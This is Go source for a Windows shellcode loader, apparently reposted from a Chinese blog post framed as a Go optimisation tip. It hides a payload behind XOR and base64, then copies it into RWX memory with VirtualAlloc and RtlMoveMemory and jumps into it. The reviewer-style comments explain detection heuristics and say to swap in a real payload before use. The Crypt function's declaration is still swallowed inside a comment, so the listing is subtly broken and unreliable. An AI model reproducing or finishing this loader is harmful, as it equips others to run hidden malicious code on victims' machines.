package main

import (
	"encoding/base64"
	"errors"
	"fmt"
	"syscall"
	"time"
	"unsafe"
)

// Win32 memory constants used by exec (values as in <memoryapi.h>).
const (
	// MEM_COMMIT and MEM_RESERVE are OR-ed together so a single VirtualAlloc
	// call both reserves and commits the region.
	MEM_COMMIT  = 0x1000
	MEM_RESERVE = 0x2000
	// PAGE_EXECUTE_READWRITE asks for memory that is writable and executable
	// at the same time (RWX). A private RWX region is one of the most widely
	// used heuristics for spotting in-memory code loading, and it violates
	// W^X hygiene; a reviewer would normally expect RW for the copy followed
	// by a protection change to RX before the jump.
	PAGE_EXECUTE_READWRITE = 0x40
)

// XorKey holds three candidate 8-byte keys for XorCipher. In the code shown
// only XorKey[0] is referenced (by Encode and Decode); the other two rows
// are unused.
//
// NOTE(review): the third byte of XorKey[0] is written as 077 — an octal
// literal equal to 0x3F — while the other rows use 0x77 in that position.
// It looks like a typo, but it is deliberately left as-is: the value is part
// of the key, and changing it would make previously Encode()d data
// undecodable. Because XorCipher folds the whole key with XOR, each row acts
// as a single byte (XorKey[0] folds to 0x73); see XorCipher.
var XorKey = [][]byte{
	{0x13, 0x54, 077, 0x1A, 0xA1, 0x3F, 0x04, 0x8B},
	{0x13, 0x54, 0x77, 0x69, 0x97, 0x3F, 0x33, 0x2B},
	{0x31, 0x23, 0x37, 0x19, 0x91, 0x3F, 0x50, 0x9B},
}

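// CipherFunc is the signature shared by the symmetric transforms in this
// file: given a key and an input buffer it returns the transformed bytes.
// XorCipher is the only implementation here; Crypt dispatches through it.
//
// In the pasted listing the declaration had been swallowed into its leading
// line comment and therefore never compiled; it is restored here.
type CipherFunc func(key []byte, src []byte) []byte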

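// XorCipher XORs every byte of src with the XOR-fold of key and returns the
// result in a new slice; src is not modified. Applying it twice with the
// same key restores the input, so Encode and Decode share it.
//
// Security note: because each input byte is XORed with *every* key byte in
// turn, the per-byte work collapses to src[i] ^ (key[0] ^ key[1] ^ ... ^
// key[n-1]) — a single constant byte, whatever the key length. This is
// obfuscation, not encryption: the effective key is recoverable from one
// known plaintext byte. The fold semantics are kept (rather than switching
// to a rolling key) so existing Encode output remains decodable; the fold is
// simply computed once instead of once per input byte.
//
// An empty key is the identity transform. An empty src returns nil, as the
// original did.
func XorCipher(key []byte, src []byte) []byte {
	if len(src) == 0 {
		return nil
	}
	var fold byte
	for _, k := range key {
		fold ^= k
	}
	dst := make([]byte, len(src))
	for i, b := range src {
		dst[i] = b ^ fold
	}
	return dst
}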

// Crypt 调用加密函数进行加密 func Crypt(cipher CipherFunc, key []byte, src []byte) []byte { return cipher(key, src) }

// Encode obfuscates src with XorKey[0] through XorCipher and returns the
// result as standard (padded) base64 — the exact form Decode expects.
//
// This is obfuscation, not encryption: XorCipher reduces to a one-byte XOR,
// so the output offers no confidentiality against anyone who can read it.
func Encode(src string) string {
	obfuscated := Crypt(XorCipher, XorKey[0], []byte(src))
	return base64.StdEncoding.EncodeToString(obfuscated)
}

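// Decode reverses Encode: it base64-decodes src and strips the XorKey[0]
// obfuscation, returning the raw bytes.
//
// Unlike the original (`decodedBytes, _ :=`), a base64 error is no longer
// ignored. On malformed input the original handed the partially decoded
// prefix to the caller — in this program that is straight into exec().
// Decode now returns nil instead; callers must treat a nil/empty result as
// failure. Behaviour on well-formed input is unchanged.
func Decode(src string) []byte {
	raw, err := base64.StdEncoding.DecodeString(src)
	if err != nil {
		return nil
	}
	return Crypt(XorCipher, XorKey[0], raw)
}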

// Lazily bound Win32 modules. syscall.NewLazyDLL resolves the module on
// first use via LoadLibrary; kernel32 and ntdll are KnownDLLs, so for these
// two names the search order is not a hijacking concern, but the same call
// on a non-system DLL name would be.
var (
	kernel32 = syscall.NewLazyDLL("kernel32.dll")
	ntdll    = syscall.NewLazyDLL("ntdll.dll")
)

// Procedures used by exec: VirtualAlloc to obtain the target region and
// RtlMoveMemory to copy the payload into it.
var (
	VirtualAlloc  = kernel32.NewProc("VirtualAlloc")
	RtlMoveMemory = ntdll.NewProc("RtlMoveMemory")
)

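// exec copies charcode into freshly allocated RWX memory and transfers
// control to it. It is Windows-only: VirtualAlloc, RtlMoveMemory and the
// shape of syscall.Syscall used here do not exist on other platforms.
//
// Changes from the original: an error is now returned (callers may still
// call exec as a bare statement) when charcode is empty — previously
// &charcode[0] would panic — or when VirtualAlloc fails. The original
// `addr, _, _ :=` dropped the error and then asked RtlMoveMemory to write
// to address 0.
//
// The region is allocated PAGE_EXECUTE_READWRITE, so no protection change
// is made before the jump; a private RWX region is also one of the most
// common heuristics memory scanners apply. The two time.Sleep(5) calls
// sleep for 5 nanoseconds (an untyped constant, not a multiple of
// time.Millisecond) and are effectively no-ops; they are kept to preserve
// behaviour.
func exec(charcode []byte) error {
	if len(charcode) == 0 {
		return errors.New("exec: empty shellcode")
	}
	size := uintptr(len(charcode))

	addr, _, err := VirtualAlloc.Call(0, size, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	if addr == 0 {
		// LazyProc.Call always returns a non-nil error value; it is only
		// meaningful when the primary result (the address) is zero.
		return fmt.Errorf("exec: VirtualAlloc failed: %v", err)
	}
	time.Sleep(5)

	// RtlMoveMemory has no return value, so there is nothing to check here.
	_, _, _ = RtlMoveMemory.Call(addr, uintptr(unsafe.Pointer(&charcode[0])), size)
	time.Sleep(5)

	// Jump into the copied bytes. This only returns if the shellcode does.
	syscall.Syscall(addr, 0, 0, 0, 0)
	return nil
}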

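// main decodes the embedded payload and hands it to exec. The payload is
// stored inline (as Encode output) instead of being read from a file at run
// time.
//
// NOTE(review): the literal "QW5kcm9pZCBoZXJlCg==" is plain base64 of the
// ASCII text "Android here\n" — a placeholder, not Encode() output. Decode
// therefore yields meaningless bytes that exec would jump to. Replace it
// with Encode(<raw bytes>) before use.
//
// The pasted original wrapped the payload in single quotes ('...'), which is
// a rune literal in Go and does not compile, and lost main's closing brace;
// both are repaired here.
func main() {
	payload := "QW5kcm9pZCBoZXJlCg=="
	shellcode := Decode(payload)
	if len(shellcode) == 0 {
		// Nothing to run; exec indexes charcode[0], which would panic on an
		// empty slice.
		return
	}
	exec(shellcode)
}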

Go 语言代码优化:避免重复读取 Payload 文件

原文地址: https://www.cveoy.top/t/topic/lPd9 著作权归作者所有。请勿转载和采集!
